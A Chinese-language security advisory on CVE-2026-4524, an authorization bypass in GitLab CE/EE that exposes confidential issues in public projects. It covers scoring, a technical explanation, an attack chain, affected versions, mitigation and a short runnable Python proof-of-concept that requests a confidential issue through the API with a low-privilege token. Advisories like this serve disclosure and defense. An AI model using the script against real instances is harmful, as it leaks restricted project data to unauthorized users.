CVE-2026-4524 GitLab未授权访问机密议题漏洞

漏洞信息

漏洞编号

CVE-2026-4524

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GitLab CE/EE

漏洞概述

CVE-2026-4524 是 GitLab 社区版（CE）和企业版（EE）中发现的一个安全漏洞。该漏洞源于系统在处理议题访问请求时未正确实施授权检查。具有低权限的经过身份验证的攻击者，可以利用此漏洞在未经授权的情况下，访问公共项目中标记为“机密”的议题内容。这一缺陷可能导致敏感信息的泄露，影响项目的安全性。GitLab 官方已在后续版本中修复了此问题，建议受影响的用户尽快采取升级措施以消除风险。

技术细节

该漏洞的深层技术原理在于 GitLab 后端在验证用户对议题资源的访问权限时存在逻辑缺陷。具体而言，当请求针对的是公共项目下的议题时，系统可能默认赋予了公共项目一定的开放性，从而在特定的代码路径中忽略了对议题特定属性“机密性”的严格校验。在正常的安全模型中，访问机密议题应当要求用户具备项目成员身份或特定的 Reporter 以上权限，且必须通过严格的权限检查模块。然而，在受影响的版本范围内，攻击者只需注册一个普通账户，无需被邀请加入目标项目，即可通过构造特定的 HTTP 请求（如直接调用 API 接口或访问特定的 URL 路径）绕过该检查机制。由于攻击向量通过网络（AV:N）且无需用户交互（UI:N），攻击过程极易自动化。CVSS 向量显示其仅影响机密性（C:H），意味着攻击者无法修改或破坏数据，但能完整读取本应受限的敏感信息，这对于源代码泄露、商业机密窃取等场景具有极高的风险。

攻击链分析

STEP 1

侦察

攻击者识别目标 GitLab 实例，并查找其中的公共项目及其对应的 Project ID。

STEP 2

认证

攻击者使用任意有效的 GitLab 账户登录，获取访问令牌或会话 Cookie（无需项目成员权限）。

STEP 3

漏洞利用

攻击者构造针对公共项目中特定议题 ID 的 API 请求，利用授权检查缺失的漏洞直接发送请求。

STEP 4

数据获取

服务器返回本应受限的机密议题详细信息，攻击者成功获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4524 Proof of Concept
# Description: Access confidential issue in public project without proper authorization.

# Target configuration
target_domain = "https://gitlab.example.com"
project_id = "123"
confidential_issue_id = "456"

# Valid authentication token for a low-privilege user
# The attacker does not need to be a member of the project
access_token = "glpat-xxxxxxxxxxxxxxxxxxxx"

url = f"{target_domain}/api/v4/projects/{project_id}/issues/{confidential_issue_id}"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"[+] Attempting to access confidential issue {confidential_issue_id}...")

try:
    response = requests.get(url, headers=headers)

    if response.status_code == 200:
        data = response.json()
        if data.get('confidential'):
            print("[!] SUCCESS: Confidential issue accessed successfully!")
            print(f"Title: {data.get('title')}")
            print(f"Description: {data.get('description')}")
        else:
            print("[-] Issue accessed but is not marked as confidential.")
    else:
        print(f"[-] Failed to access issue. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

GitLab CE/EE 18.9.1 至 18.9.6

GitLab CE/EE 18.10.0 至 18.10.5

GitLab CE/EE 18.11.0 至 18.11.2

防御指南

临时缓解措施

如果无法立即升级，建议管理员暂时将包含高度敏感信息的公共项目转为私有项目，或严格监控对这些议题的 API 访问请求，确保只有受信任的 IP 地址或用户组可以访问。同时，应加强对机密议题内容的审查，确保没有关键数据暴露。